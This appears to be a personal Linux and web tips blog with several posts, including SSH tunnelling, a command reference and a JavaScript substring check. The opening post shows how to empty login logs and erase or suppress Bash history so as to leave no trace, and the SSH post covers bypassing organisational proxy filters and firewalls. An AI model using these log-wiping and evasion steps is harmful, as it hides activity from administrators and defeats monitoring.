lastb /var/log/btmp Shows the bad login attempts
lastlog /var/log/lastlog Shows the most recent login
echo > /var/log/wtmp
echo > /var/log/btmp
echo > /var/log/lastlog
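A side note on the echo > file idiom above: it leaves a single newline byte in the file. To truncate to exactly zero bytes, use the : builtin instead (the filename below is just a scratch file for illustration):

```shell
echo > wtmp.test
wc -c < wtmp.test   # 1 byte: the newline written by echo
: > wtmp.test
wc -c < wtmp.test   # 0 bytes: truly empty
rm -f wtmp.test
```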

Remove history :

Clear Bash history completely :
Type the following command to clear all your Bash history:
history -cw
-c Clear the history list
-w Write out the current history to the history file

Remove a certain line from Bash history :
Type the following commands to remove a certain line (e.g. 352) from the Bash history file:
history -d 352
history -w
-d Delete the specified line from the history
-w Write the change out to the history file

Clear current session history :
Type the following command to clear the Bash history of the current session only:
history -r

Execute a command without saving it in the Bash history :
Put a space in front of your command and it won’t be saved in the Bash history (this relies on HISTCONTROL containing ignorespace or ignoreboth, the default on many distributions).

Don’t save commands in Bash history for current session :
Unsetting HISTFILE will cause any commands that you have executed in the current shell session not to be written to your bash_history file upon logout.

Change in the current session the path of the history file :
export HISTFILE=/dev/null

Three ways to Remove Only Current Session Bash History and Leave Older History Untouched :
kill -9 $$
unset HISTFILE && exit
history -r && exit

The commands above do not guarantee that you will leave no trace.
Be aware that if you make a program/script listen on a port without hiding it, it can be monitored.
The commands you type can also be monitored (the shell can be a chroot jail, for example), logs can be sent to a syslog server and/or the admin can be notified, so be careful.
source 1
source 2

Auteur : Harlok

2020-10-06 14:10:26

Recall argument of previous command

!!:n where n is the 0-based position of the argument you want.
The ! prefix is used to access previous commands.

Other useful commands:
  • !$ - last argument from previous command

  • !^ - first argument (after the program/built-in/script) from previous command

  • $_ - recall the last argument of the previous command.

  • !! - previous command (often pronounced "bang bang")

  • !n - command number n from history

  • !pattern - most recent command matching pattern

  • !!:s/find/replace - last command, substitute find with replace

Also, if you want an arbitrary argument, you can use !!:1, !!:2, etc. (!!:0 is the previous command itself.)

For example:

echo 'one' 'two'
# "one two"
echo !!:2
# "two"

If you know the number given in the history for a particular command, you can take pretty much any argument of that command using the following terms.
Use the following to take the second argument from the third command in the history:

!3:2

Use the following to take the third argument from the fifth last command in the history:

!-5:3

Using a minus sign, you ask it to traverse backwards from the last command of the history.

Auteur : Harlok

2019-05-13 17:35:15

How to check whether a string contains a substring in JavaScript

ES6 introduced String.prototype.includes:
var string = "foo",
substring = "oo";
string.includes(substring); // true

includes doesn’t have IE support, though. In an ES5 or older environment, String.prototype.indexOf, which returns −1 when it doesn’t find the substring, can be used instead:
var string = "foo",
substring = "oo";
string.indexOf(substring) !== -1

Note that this does not work in Internet Explorer or some other old browsers with no or incomplete ES6 support. To make it work in old browsers, you may wish to use a transpiler like Babel, a shim library like es6-shim, or this polyfill from MDN:
if (!String.prototype.includes) {
  String.prototype.includes = function(search, start) {
    'use strict';
    if (typeof start !== 'number') {
      start = 0;
    }
    if (start + search.length > this.length) {
      return false;
    } else {
      return this.indexOf(search, start) !== -1;
    }
  };
}
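Whichever variant you use, includes takes an optional start index that behaves like indexOf’s second argument, for example:

```javascript
// includes(search, start): the optional start index is where the search begins
console.log("My long string".includes("long"));          // true
console.log("My long string".includes("My", 3));         // false: search starts at index 3
console.log("My long string".indexOf("string") !== -1);  // true: the pre-ES6 equivalent
```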

Auteur : Harlok

2019-05-11 21:18:45

Change permissions for a folder and all of its subfolders and files Linux

To change all permissions to the same type recursively:
chmod -R 775 /folder
To change all the directories to 755 (drwxr-xr-x):
find /folder -type d -exec chmod 755 {} \;
To change all the files to 644 (-rw-r--r--):
find /folder -type f -exec chmod 644 {} \;
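The two find invocations can often be collapsed into a single chmod pass using the symbolic X bit, which grants execute only to directories (and to files that already have an execute bit). A sketch on a scratch tree (the /tmp paths are just for demonstration):

```shell
# Directories end up 755, plain files 644, in one recursive pass.
mkdir -p /tmp/permdemo/sub
touch /tmp/permdemo/sub/file.txt
chmod -R u=rwX,go=rX /tmp/permdemo
stat -c '%a %n' /tmp/permdemo/sub /tmp/permdemo/sub/file.txt
# → 755 /tmp/permdemo/sub
# → 644 /tmp/permdemo/sub/file.txt
```

This only matches the find version when no file should keep an execute bit it already has; otherwise stick with the explicit find commands.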

Auteur : Harlok

2019-05-10 16:16:53

SSH Tunneling Explained


A SSH tunnel consists of an encrypted tunnel created through a SSH protocol connection. A SSH tunnel can be used to transfer unencrypted traffic over a network through an encrypted channel. For example we can use a ssh tunnel to securely transfer files between a FTP server and a client even though the FTP protocol itself is not encrypted. SSH tunnels also provide a means to bypass firewalls that prohibit or filter certain internet services. For example an organization may block certain sites using its proxy filter. But users may not wish to have their web traffic monitored or blocked by the organization proxy filter. If users can connect to an external SSH server, they can create a SSH tunnel to forward a given port on their local machine to port 80 on a remote web server via the external SSH server. I will describe this scenario in detail in a little while.
To set up a SSH tunnel, a given port of one machine needs to be forwarded (of which I am going to talk about in a little while) to a port on the other machine which will be the other end of the tunnel. Once the SSH tunnel has been established, the user can connect to the earlier specified port on the first machine to access the network service.

Port Forwarding

SSH tunnels can be created in several ways using different kinds of port forwarding mechanisms. Ports can be forwarded in three ways.

  1. Local port forwarding

  2. Remote port forwarding

  3. Dynamic port forwarding

I didn’t explain what port forwarding is. I found Wikipedia’s definition more explanatory.

Port forwarding or port mapping is a name given to the combined technique of

  1. translating the address and/or port number of a packet to a new destination

  2. possibly accepting such packet(s) in a packet filter (firewall)

  3. forwarding the packet according to the routing table.

Here the first technique will be used in creating an SSH tunnel. When a client application connects to the local port (local endpoint) of the SSH tunnel and transfers data, the data will be forwarded to the remote end by translating the host and port values to those of the remote end of the channel.

So with that, let’s see how SSH tunnels can be created using forwarded ports, with examples.

Tunnelling with Local port forwarding

Let’s say that yahoo.com is being blocked using a proxy filter in the University. (For the sake of this example; cannot think of any valid reason why yahoo would be blocked.) A SSH tunnel can be used to bypass this restriction. Let’s name my machine at the university as ‘work’ and my home machine as ‘home’. ‘home’ needs to have a public IP for this to work. And I am running a SSH server on my home machine. Following diagram illustrates the scenario.

To create the SSH tunnel execute following from ‘work’ machine.

ssh -L 9001:yahoo.com:80 home

The ‘L’ switch indicates that a local port forward needs to be created. The switch syntax is as follows.

-L <local-port-to-listen>:<remote-host>:<remote-port>

Now the SSH client at ‘work’ will connect to the SSH server running at ‘home’ (usually running at port 22), binding port 9001 of ‘work’ to listen for local requests, thus creating a SSH tunnel between ‘home’ and ‘work’. At the ‘home’ end it will create a connection to ‘yahoo.com’ at port 80. So ‘work’ doesn’t need to know how to connect to yahoo.com; only ‘home’ needs to worry about that. The channel between ‘work’ and ‘home’ will be encrypted while the connection between ‘home’ and ‘yahoo.com’ will be unencrypted.

Now it is possible to browse yahoo.com by visiting http://localhost:9001 in the web browser at the ‘work’ computer. The ‘home’ computer will act as a gateway which accepts requests from the ‘work’ machine, fetches the data and tunnels it back. So the syntax of the full command would be as follows.

ssh -L <local-port-to-listen>:<remote-host>:<remote-port> <gateway>

The image below describes the scenario.

Here the ‘home’ to ‘yahoo.com’ connection is only made when the browser makes the request, not at tunnel setup time.

It is also possible to specify a port in the ‘home’ computer itself instead of connecting to an external host. This is useful if I were to set up a VNC session between ‘work’ and ‘home’. Then the command line would be as follows.

ssh -L 5900:localhost:5900 home (Executed from 'work')

So here what does localhost refer to? Is it ‘work’, since the command line is executed from ‘work’? Turns out that it is not. As explained earlier, localhost is relative to the gateway (‘home’ in this case), not the machine from where the tunnel is initiated. So this will make a connection to port 5900 of the ‘home’ computer, where the VNC server would be listening.

The created tunnel can be used to transfer all kinds of data, not limited to web browsing sessions. We can also tunnel SSH sessions through it. Let’s assume there is another computer (‘banned’) to which we need to SSH from within the University, but SSH access to it is blocked. It is possible to tunnel a SSH session to this host using a local port forward. The setup would look like this.

As can be seen now the transferred data between ‘work’ and ‘banned’ are encrypted end to end. For this we need to create a local port forward as follows.

ssh -L 9001:banned:22 home

Now we need to create a SSH session to local port 9001 from where the session will get tunneled to ‘banned’ via ‘home’ computer.

ssh -p 9001 localhost

With that let’s move on to next type of SSH tunnelling method, reverse tunnelling.

Reverse Tunnelling with remote port forwarding

Let’s say it is required to connect to an internal university website from home. The university firewall is blocking all incoming traffic. How can we connect from ‘home’ to the internal network so that we can browse the internal site? A VPN setup is a good candidate here. However, for this example let’s assume we don’t have this facility. Enter SSH reverse tunnelling.

As in the earlier case we will initiate the tunnel from the ‘work’ computer behind the firewall. This is possible since only incoming traffic is blocked and outgoing traffic is allowed. However, unlike the earlier case, the client will now be at the ‘home’ computer. Instead of the -L option we now use -R, which specifies that a reverse tunnel needs to be created.

ssh -R 9001:intra-site:80 home (Executed from 'work')

Once executed, the SSH client at ‘work’ will connect to the SSH server running at ‘home’, creating a SSH channel. Then the server will bind port 9001 on the ‘home’ machine to listen for incoming requests which would subsequently be routed through the created SSH channel between ‘home’ and ‘work’. Now it’s possible to browse the internal site by visiting http://localhost:9001 in the ‘home’ web browser. The ‘work’ machine will then create a connection to the intra-site and relay back the response to ‘home’ via the created SSH channel.

As nice as all of this is, you still need to create another tunnel for each additional site, in both cases. Wouldn’t it be nice if it were possible to proxy traffic to any site using the single SSH channel created? That’s what dynamic port forwarding is all about.

Dynamic Port Forwarding

Dynamic port forwarding allows you to configure one local port for tunnelling data to all remote destinations. However, to utilize this, the client application connecting to the local port should send its traffic using the SOCKS protocol. At the client side of the tunnel a SOCKS proxy would be created, and the application (eg. browser) uses the SOCKS protocol to specify where the traffic should be sent when it leaves the other end of the ssh tunnel.

ssh -D 9001 home (Executed from 'work')

Here SSH will create a SOCKS proxy listening for connections at local port 9001 and, upon receiving a request, will route the traffic via the SSH channel created between ‘work’ and ‘home’. For this, the browser needs to be configured to point to the SOCKS proxy at port 9001 on localhost.
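The three forwarding types can also be declared in ~/.ssh/config so that a plain `ssh home` brings the tunnels up. The host names and ports below are placeholders matching the examples above, not real values; distinct local ports are used because each forward needs its own listening port:

```
# ~/.ssh/config (hypothetical values)
Host home
    HostName home.example.org          # the machine with the public IP
    LocalForward 9001 yahoo.com:80     # like -L 9001:yahoo.com:80
    RemoteForward 9002 intra-site:80   # like -R 9002:intra-site:80
    DynamicForward 9003                # like -D 9003 (SOCKS proxy)
```

Non-browser clients can use the SOCKS proxy too; for example curl supports it via its --socks5-hostname option.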


Auteur : Harlok

2019-05-10 15:09:49

Linux Commands reference

This is a linux command line reference for common operations. Examples marked with • are valid/safe to paste without modification into a terminal, so you may want to keep a terminal window open while reading this so you can cut & paste.

apropos whatis  Show commands pertinent to string. See also threadsafe
man -t ascii | ps2pdf - > ascii.pdf  Make a pdf of a manual page
 which command  Show full path name of command
 time command  See how long a command takes
time cat  Start stopwatch. Ctrl-d to stop. See also sw
dir navigation
cd -Go to previous directory
cdGo to $HOME directory
 (cd dir && command)Go to dir, execute command and return to current dir
pushd .Put current dir on stack so you can popd back to it
alias l='ls -l --color=auto'quick dir listing.
ls -lrtList files by date. See also newest and find_mm_yyyy
ls /usr/bin | pr -T9 -W$COLUMNSPrint in 9 columns to width of terminal
 find -name '*.[ch]' | xargs grep -E 'expr'Search 'expr' in this dir and below. See also findrepo
 find -type f -print0 | xargs -r0 grep -F 'example'Search all regular files for 'example' in this dir and below
 find -maxdepth 1 -type f | xargs grep -F 'example'Search all regular files for 'example' in this dir
 find -maxdepth 1 -type d | while read dir; do echo $dir; echo cmd2; doneProcess each item with multiple commands (in while loop)
find -type f ! -perm -444Find files not readable by all (useful for web site)
find -type d ! -perm -111Find dirs not accessible by all (useful for web site)
locate -r 'file[^/]*\.txt'Search cached index for names. This re is like glob *file*.txt
look referenceQuickly search (sorted) dictionary for prefix
grep --color reference /usr/share/dict/wordsHighlight occurances of regular expression in dictionary
archives and compression
 gpg -c fileEncrypt file
 gpg file.gpgDecrypt file
 tar -c dir/ | bzip2 > dir.tar.bz2Make compressed archive of dir/
 bzip2 -dc dir.tar.bz2 | tar -xExtract archive (use gzip instead of bzip2 for tar.gz files)
 tar -c dir/ | gzip | gpg -c | ssh user@remote 'dd of=dir.tar.gz.gpg'Make encrypted archive of dir/ on remote machine
 find dir/ -name '*.txt' | tar -c --files-from=- | bzip2 > dir_txt.tar.bz2Make archive of subset of dir/ and below
 find dir/ -name '*.txt' | xargs cp -a --target-directory=dir_txt/ --parentsMake copy of subset of dir/ and below
 ( tar -c /dir/to/copy ) | ( cd /where/to/ && tar -x -p )Copy (with permissions) copy/ dir to /where/to/ dir
 ( cd /dir/to/copy && tar -c . ) | ( cd /where/to/ && tar -x -p )Copy (with permissions) contents of copy/ dir to /where/to/
 ( tar -c /dir/to/copy ) | ssh -C user@remote 'cd /where/to/ && tar -x -p' Copy (with permissions) copy/ dir to remote:/where/to/ dir
 dd bs=1M if=/dev/sda | gzip | ssh user@remote 'dd of=sda.gz'Backup harddisk to remote machine
rsync (Network efficient file copier: Use the --dry-run option for testing)
 rsync -P rsync://url file  Only get diffs. Do multiple times for troublesome downloads
 rsync --bwlimit=1000 fromfile tofile  Locally copy with rate limit. It's like nice for I/O
 rsync -az -e ssh --delete ~/public_html/ remote:'~/public_html'  Mirror web site (using compression and encryption)
 rsync -auz -e ssh remote:/dir/ . && rsync -auz -e ssh . remote:/dir/  Synchronize current directory with remote one
ssh (Secure SHell)
 ssh $USER@$HOST commandRun command on $HOST as $USER (default command=shell)
ssh -f -Y $USER@$HOSTNAME xeyesRun GUI command on $HOSTNAME as $USER
 scp -p -r $USER@$HOST: file dir/Copy with permissions to $USER's home directory on $HOST
 scp -c arcfour $USER@$LANHOST: bigfileUse faster crypto for local LAN. This might saturate GigE
 ssh -g -L 8080:localhost:80 root@$HOSTForward connections to $HOSTNAME:8080 out to $HOST:80
 ssh -R 1434:imap:143 root@$HOSTForward connections from $HOST:1434 in to imap:143
 ssh-copy-id $USER@$HOST Install public key for $USER@$HOST for password-less log in
wget (multi purpose download tool)
(cd dir/ && wget -nd -pHEKk url)  Store local browsable version of a page to the current dir
 wget -c url  Continue downloading a partially downloaded file
 wget -r -nd -np -l1 -A '*.jpg' url  Download a set of files to the current directory
 wget ftp://remote/file[1-9].iso/  FTP supports globbing directly
wget -q -O- url | grep 'a href' | head  Process output directly
 echo 'wget url' | at 01:00  Download url at 1AM to current dir
 wget --limit-rate=20k url  Do a low priority download (limit to 20KB/s in this case)
 wget -nv --spider --force-html -i bookmarks.html  Check links in a file
 wget --mirror url  Update a local copy of a site (handy from cron)
networking (Note ifconfig, route, mii-tool, nslookup commands are obsolete)
 ethtool eth0Show status of ethernet interface eth0
 ethtool --change eth0 autoneg off speed 100 duplex fullManually set ethernet interface speed
 iw dev wlan0 linkShow link status of wireless interface wlan0
 iw dev wlan0 set bitrates legacy-2.4 1Manually set wireless interface speed
iw dev wlan0 scanList wireless networks in range
ip link showList network interfaces
 ip link set dev eth0 name wanRename interface eth0 to wan
 ip link set dev eth0 upBring interface eth0 up (or down)
ip addr showList addresses for interfaces
 ip addr add <ip>/24 brd + dev eth0  Add (or del) ip and mask
ip route showList routing table
 ip route add default via <gateway-ip>  Set default gateway
ss -tuplList internet services on a system
ss -tupList active connections to/from system
host pixelbeat.orgLookup DNS ip address for name or vice versa
hostname -iLookup local ip address (equivalent to host `hostname`)
whois pixelbeat.orgLookup whois info for hostname or ip address
windows networking (Note samba is the package that provides all this windows specific networking support)
smbtreeFind windows machines. See also findsmb
 nmblookup -A <ip>  List the windows (netbios) name associated with ip address
 smbclient -L windows_boxList shares on windows machine or samba server
 mount -t smbfs -o fmask=666,guest //windows_box/share /mnt/shareMount a windows share
 echo 'message' | smbclient -M windows_boxSend popup to windows machine (off by default in XP sp2)
text manipulation (Note sed uses stdin and stdout. Newer versions support inplace editing with the -i option)
 sed 's/string1/string2/g'Replace string1 with string2
 sed 's/\(.*\)1/\12/g'Modify anystring1 to anystring2
 sed '/^ *#/d; /^ *$/d'Remove comments and blank lines
 sed ':a; /\\$/N; s/\\\n//; ta'Concatenate lines with trailing \
 sed 's/[ \t]*$//'Remove trailing spaces from lines
 sed 's/\([`"$\]\)/\\\1/g'Escape shell metacharacters active within double quotes
seq 10 | sed "s/^/      /; s/ *\(.\{7,\}\)/\1/"Right align numbers
seq 10 | sed p | paste - -Duplicate a column
 sed -n '1000{p;q}'Print 1000th line
 sed -n '10,20p;20q'Print lines 10 to 20
 sed -n 's/.*<title>\(.*\)<\/title>.*/\1/ip;T;q'Extract title from HTML web page
 sed -i 42d ~/.ssh/known_hostsDelete a particular line
 sort -t. -k1,1n -k2,2n -k3,3n -k4,4nSort IPV4 ip addresses
echo 'Test' | tr '[:lower:]' '[:upper:]'Case conversion
tr -dc '[:print:]' < /dev/urandomFilter non printable characters
tr -s '[:blank:]' '\t' </proc/diskstats | cut -f4cut fields separated by blanks
history | wc -lCount lines
seq 10 | paste -s -d ' 'Concatenate and separate line items to a single line
set operations (Note you can export LANG=C for speed. Also these assume no duplicate lines within a file)
 sort -u file1 file2Union of unsorted files
 sort file1 file2 | uniq -dIntersection of unsorted files
 sort file1 file1 file2 | uniq -uDifference of unsorted files
 sort file1 file2 | uniq -uSymmetric Difference of unsorted files
 join -t'\0' -a1 -a2 file1 file2Union of sorted files
 join -t'\0' file1 file2Intersection of sorted files
 join -t'\0' -v2 file1 file2Difference of sorted files
 join -t'\0' -v1 -v2 file1 file2Symmetric Difference of sorted files
echo '(1 + sqrt(5))/2' | bc -lQuick math (Calculate φ). See also bc
seq -f '4/%g' 1 2 99999 | paste -sd-+ | bc -lCalculate π the unix way
echo 'pad=20; min=64; (100*10^6)/((pad+min)*8)' | bcMore complex (int) e.g. This shows max FastE packet rate
echo 'pad=20; min=64; print (100E6)/((pad+min)*8)' | pythonPython handles scientific notation
echo 'pad=20; plot [64:1518] (100*10**6)/((pad+x)*8)' | gnuplot -persistPlot FastE packet rate vs packet size
echo 'obase=16; ibase=10; 64206' | bcBase conversion (decimal to hexadecimal)
echo $((0x2dec))Base conversion (hex to dec) ((shell arithmetic expansion))
units -t '100m/9.58s' 'miles/hour'Unit conversion (metric to imperial)
units -t '500GB' 'GiB'Unit conversion (SI to IEC prefixes). See also numfmt
units -t '1 googol'Definition lookup
seq 100 | paste -s -d+ | bcAdd a column of numbers. See also add and funcpy
cal -3Display a calendar
cal 9 1752Display a calendar for a particular month year
date -d friWhat date is it this friday. See also day
[ $(date -d '12:00 today +1 day' +%d) = '01' ] || exitexit a script unless it's the last day of the month
date --date='25 Dec' +%AWhat day does xmas fall on, this year
date --date='@2147483647'Convert seconds since the epoch (1970-01-01 UTC) to date
TZ='America/Los_Angeles' dateWhat time is it on west coast of US (use tzselect to find TZ)
date --date='TZ="America/Los_Angeles" 09:00 next Fri'What's the local time for 9AM next Friday on west coast US
printf "%'d\n" 1234Print number with thousands grouping appropriate to locale
BLOCK_SIZE=\'1 ls -lUse locale thousands grouping in ls. See also l
echo "I live in `locale territory`"Extract info from locale database
LANG=en_IE.utf8 locale int_prefixLookup locale info for specific country. See also ccodes
locale -kc $(locale | sed -n 's/\(LC_.\{4,\}\)=.*/\1/p') | lessList fields available in locale database
recode (Obsoletes iconv, dos2unix, unix2dos)
recode -l | lessShow available conversions (aliases on each line)
 recode windows-1252.. file_to_change.txtWindows "ansi" to local charset (auto does CRLF conversion)
 recode utf-8/CRLF.. file_to_change.txtWindows utf8 to local charset
 recode iso-8859-15..utf8 file_to_change.txtLatin9 (western europe) to utf8
 recode ../b64 < file.txt > file.b64Base64 encode
 recode /qp.. < file.qp > file.txtQuoted printable decode
 recode ..HTML < file.txt > file.htmlText to HTML
recode -lf windows-1252 | grep euroLookup table of characters
echo -n 0x80 | recode latin-9/x1..dumpShow what a code represents in latin-9 charmap
echo -n 0x20AC | recode ucs-2/x2..latin-9/xShow latin-9 encoding
echo -n 0x20AC | recode ucs-2/x2..utf-8/xShow utf-8 encoding
 gzip < /dev/cdrom > cdrom.iso.gzSave copy of data cdrom
 mkisofs -V LABEL -r dir | gzip > cdrom.iso.gzCreate cdrom image from contents of dir
 mount -o loop cdrom.iso /mnt/dirMount the cdrom image at /mnt/dir (read only)
 wodim dev=/dev/cdrom blank=fastClear a CDRW
 gzip -dc cdrom.iso.gz | wodim -tao dev=/dev/cdrom -v -data -Burn cdrom image (use --prcap to confirm dev)
 cdparanoia -BRip audio tracks from CD to wav files in current dir
 wodim -v dev=/dev/cdrom -audio -pad *.wavMake audio CD from all wavs in current dir (see also cdrdao)
 oggenc --tracknum=$track track.cdda.wav -o track.oggMake ogg file from wav file
disk space
ls -lSrShow files by size, biggest last
du -s * | sort -k1,1rn | headShow top disk users in current dir. See also dutop
du -hs /home/* | sort -k1,1hSort paths by easy to interpret disk usage
df -hShow free space on mounted filesystems
df -iShow free inodes on mounted filesystems
fdisk -lShow disks partitions sizes and types (run as root)
rpm -q -a --qf '%10{SIZE}\t%{NAME}\n' | sort -k1,1nList all packages by installed size (Bytes) on rpm distros
dpkg-query -W -f='${Installed-Size;10}\t${Package}\n' | sort -k1,1nList all packages by installed size (KBytes) on deb distros
dd bs=1 seek=2TB if=/dev/null of=ext3.testCreate a large test file (taking no space). See also truncate
> file  Truncate data of file or create an empty file
tail -f /var/log/messagesMonitor messages in a log file
strace -c ls >/dev/nullSummarise/profile system calls made by command
strace -f -e open ls >/dev/nullList system calls made by command
strace -f -e trace=write -e write=1,2 ls >/dev/nullMonitor what's written to stdout and stderr
ltrace -f -e getenv ls >/dev/nullList library calls made by command
lsof -p $$List paths that process id has open
lsof ~List processes that have specified path open
tcpdump not port 22Show network traffic except ssh. See also tcpdump_not_me
ps -e -o pid,args --forestList processes in a hierarchy
ps -e -o pcpu,cpu,nice,state,cputime,args --sort pcpu | sed '/^ 0.0 /d'List processes by % cpu usage
ps -e -orss=,args= | sort -b -k1,1n | pr -TW$COLUMNS  List processes by mem (KB) usage
ps -C firefox-bin -L -o pid,tid,pcpu,stateList all threads for a particular process
ps -p 1,$$ -o etime=List elapsed wall time for particular process IDs
watch -n.1 pstree -Uacp $$Display a changing process subtree
last rebootShow system reboot history
free -mShow amount of (remaining) RAM (-m displays in MB)
watch -n.1 'cat /proc/interrupts'Watch changeable data continuously
udevadm monitorMonitor udev events to help configure rules
system information (see also sysinfo) ('#' means root access is required)
uname -aShow kernel version and system architecture
head -n1 /etc/issueShow name and version of distribution
cat /proc/partitionsShow all partitions registered on the system
grep MemTotal /proc/meminfoShow RAM total seen by the system
grep "model name" /proc/cpuinfoShow CPU(s) info
lspci -tvShow PCI info
lsusb -tvShow USB info
mount | column -tList mounted filesystems on the system (and align output)
grep -F capacity: /proc/acpi/battery/BAT0/infoShow state of cells in laptop battery
#dmidecode -q | lessDisplay SMBIOS/DMI information
#smartctl -A /dev/sda | grep Power_On_HoursHow long has this disk (system) been powered on in total
#hdparm -i /dev/sdaShow info about disk sda
#hdparm -tT /dev/sdaDo a read speed test on disk sda
#badblocks -s /dev/sdaTest for unreadable blocks on disk sda
interactive (see also linux keyboard shortcuts)
readlineLine editor used by bash, python, bc, gnuplot, ...
screenVirtual terminals with detach capability, ...
mcPowerful file manager that can browse rpm, tar, ftp, ssh, ...
gnuplotInteractive/scriptable graphing
linksWeb browser
xdg-open .open a file or url with the registered desktop application
grep . /proc/sys/net/ipv4/*List the contents of flag files
set | grep $USERSearch current environment
tr '\0' '\n' < /proc/$$/environDisplay the startup environment for any process
echo $PATH | tr : '\n'Display the $PATH one per line
kill -0 $$ && echo process exists and can accept signalsCheck for the existence of a process (pid)
find /etc -readable | xargs less -K -p'*ntp' -j $((${LINES:-25}/2))Search paths and data with full context. Use n to iterate
namei -l ~/.sshOutput attributes for all directories leading to a file name
Low impact admin
#apt-get install "package" -o Acquire::http::Dl-Limit=42 \
-o Acquire::Queue-mode=access
Rate limit apt-get to 42KB/s
 echo 'wget url' | at 01:00Download url at 1AM to current dir
#apache2ctl configtest && apache2ctl gracefulRestart apache if config is OK
nice openssl speed sha1Run a low priority command (openssl benchmark)
chrt -i 0 openssl speed sha1Run a low priority command (more effective than nice)
renice 19 -p $$; ionice -c3 -p $$Make shell (script) low priority. Use for non interactive tasks
Interactive monitoring
watch -t -n1 uptimeClock with system load
htop -d 5Better top (scrollable, tree view, lsof/strace integration, ...)
iotopWhat's doing I/O
#watch -d -n30 "nice <mem-report-cmd> | tail -n $((${LINES:-12}-2))"  What's using RAM
#iftopWhat's using the network. See also iptraf
#mtr www.pixelbeat.orgping and traceroute combined
Useful utilities
pv < /dev/zero > /dev/nullProgress Viewer for data copying from files and pipes
wkhtmltopdf http://.../linux_commands.html linux_commands.pdf  Make a pdf of a web page
timeout 1 sleep infrun a command with bounded time. See also timeout
python -m SimpleHTTPServerServe current directory tree at http://$HOSTNAME:8000/
openssl s_client -connect <host>:443 </dev/null 2>&0 |
openssl x509 -dates -noout
Display the date range for a site's certs
curl -I www.pixelbeat.orgDisplay the server headers for a web site
#lsof -i tcp:80What's using port 80
#httpd -SDisplay a list of apache virtual hosts
vim scp://user@remote//path/to/fileEdit remote file using local vim. Good for high latency links
curl -s url | gpg --import  Import a gpg key from the web
tc qdisc add dev lo root handle 1:0 netem delay 20msecAdd 20ms latency to loopback device (for testing)
tc qdisc del dev lo rootRemove latency added above
echo "DISPLAY=$DISPLAY xmessage cooker" | at "NOW +30min"Popup reminder
notify-send "subject" "message"Display a gnome popup notification
 echo "mail -s 'go home' < /dev/null" | at 17:30Email reminder
 uuencode file name | mail -s subject P@draigBrady.com  Send a file via email
 <html-generating-cmd> | mail -a "Content-Type: text/html" P@draigBrady.com  Send/Generate HTML email
Better default settings (useful in your .bashrc)
#tail -s.1 -f /var/log/messagesDisplay file additions more responsively
seq 100 | tail -n $((${LINES:-12}-2))Display as many lines as possible without scrolling
#tcpdump -s0Capture full network packets
Useful functions/aliases (useful in your .bashrc)
md () { mkdir -p "$1" && cd "$1"; }Change to a new directory
strerror() { python -c "import os; print os.strerror($1)"; }Display the meaning of an errno
plot() { { echo 'plot "-"' "$@"; cat; } | gnuplot -persist; }Plot stdin. (e.g: • seq 1000 | sed 's/.*/s(&)/' | bc -l | plot)
hili() { e="$1"; shift; grep --col=always -Eih "$e|$" "$@"; }highlight occurences of expr. (e.g: • env | hili $USER)
alias hd='od -Ax -tx1z -v'Hexdump. (usage e.g.: • hd /proc/self/cmdline | less)
alias realpath='readlink -f'Canonicalize path. (usage e.g.: • realpath ~/../$USER)
ord() { printf "0x%x\n" "'$1"; }shell version of the ord() function
chr() { printf $(printf '\\%03o\\n' "$1"); }shell version of the chr() function
DISPLAY=:0.0 import -window root orig.pngTake a (remote) screenshot
convert -filter catrom -resize '600x>' orig.png 600px_wide.pngShrink to width, computer gen images or screenshots
 mplayer -ao pcm -vo null -vc dummy /tmp/Flash*Extract audio from flash video to audiodump.wav
 ffmpeg -i filename.aviDisplay info about multimedia file
ffmpeg -f x11grab -s xga -r 25 -i :0 -sameq demo.mpgCapture video of an X display
 for i in $(seq 9); do ffmpeg -i $i.avi -target pal-dvd $i.mpg; doneConvert video to the correct encoding and aspect for DVD
 dvdauthor -odvd -t -v "pal,4:3,720xfull" *.mpg;dvdauthor -odvd -TBuild DVD file system. Use 16:9 for widescreen input
 growisofs -dvd-compat -Z /dev/dvd -dvd-video dvdBurn DVD file system to disc
python -c "import unicodedata as u; print(u.name(u'\u20ac'))"  Lookup a unicode character
uconv -f utf8 -t utf8 -x nfcNormalize combining characters
printf '\300\200' | iconv -futf8 -tutf8 >/dev/nullValidate UTF-8
printf 'ŨTF8\n' | LANG=C grep --color=always '[^ -~]\+'Highlight non printable ASCII chars in UTF-8
fc-match -s "sans:lang=zh"List font match order for language and style
gcc -march=native -E -v -</dev/null 2>&1|sed -n 's/.*-mar/-mar/p'Show autodetected gcc tuning params. See also gcccpuopt
for i in $(seq 4); do { [ $i = 1 ] && wget -qO- url ||
./a.out; } | tee /dev/tty | gcc -xc - 2>/dev/null; done
Compile and execute C code from stdin
cpp -dM /dev/nullShow all predefined macros
echo "#include <features.h>" | cpp -dN | grep "#define __USE_"Show all glibc feature macros
 gdb -tuiDebug showing source code context in separate windows
udevadm info -a -p $(udevadm info -q path -n /dev/input/mouse0)List udev attributes of a device, for matching rules etc.
udevadm test /sys/class/input/mouse0See how udev rules are applied for a device
#udevadm control --reload-rulesReload udev rules after modification
Extended Attributes (Note you may need to (re)mount with "acl" or "user_xattr" options)
getfacl .Show ACLs for file
setfacl -m u:nobody:r .Allow a specific user to read file
setfacl -x u:nobody .Delete a specific user's rights to file
 setfacl --default -m group:users:rw- dir/Set umask for a for a specific dir
 getcap fileShow capabilities for a program
 setcap cap_net_raw+ep your_gtk_progAllow gtk program raw access to network
stat -c%C .Show SELinux context for file
 chcon ... fileSet SELinux context for file (see also restorecon)
getfattr -m- -d .Show all extended attributes (includes selinux,acls,...)
setfattr -n "" -v "bar" .Set arbitrary user attributes
BASH specific
echo 123 | tee >(tr 1 a) | tr 1 bSplit data to 2 commands (using process substitution)
 meld local_file <(ssh host cat remote_file)Compare a local and remote file (using process substitution)
taskset -c 0 nprocRestrict a command to certain processors
find -type f -print0 | xargs -r0 -P$(nproc) -n10 md5sumProcess files in parallel over available processors
 sort -m <(sort data1) <(sort data2) >data.sortedSort separate data files over 2 processors
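The process-substitution entries above can be tried with a small self-contained example (the file names here are throwaway placeholders, not from the list): `<(...)` feeds a command's output wherever a filename is expected, so two unsorted lists can be compared without creating intermediate sorted files.

```shell
# comm -12 prints only the lines common to two *sorted* inputs;
# process substitution sorts each list on the fly.
printf '%s\n' banana apple cherry > list1
printf '%s\n' apple durian > list2
comm -12 <(sort list1) <(sort list2)   # prints: apple
rm -f list1 list2
```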

Auteur : Harlok

2019-05-13 11:24:41

Vim reference

vim file +54  - open file and go to line 54. Any : command can be run using + on the command line.
vim -O file1 file2  - open file1 and file2 side by side
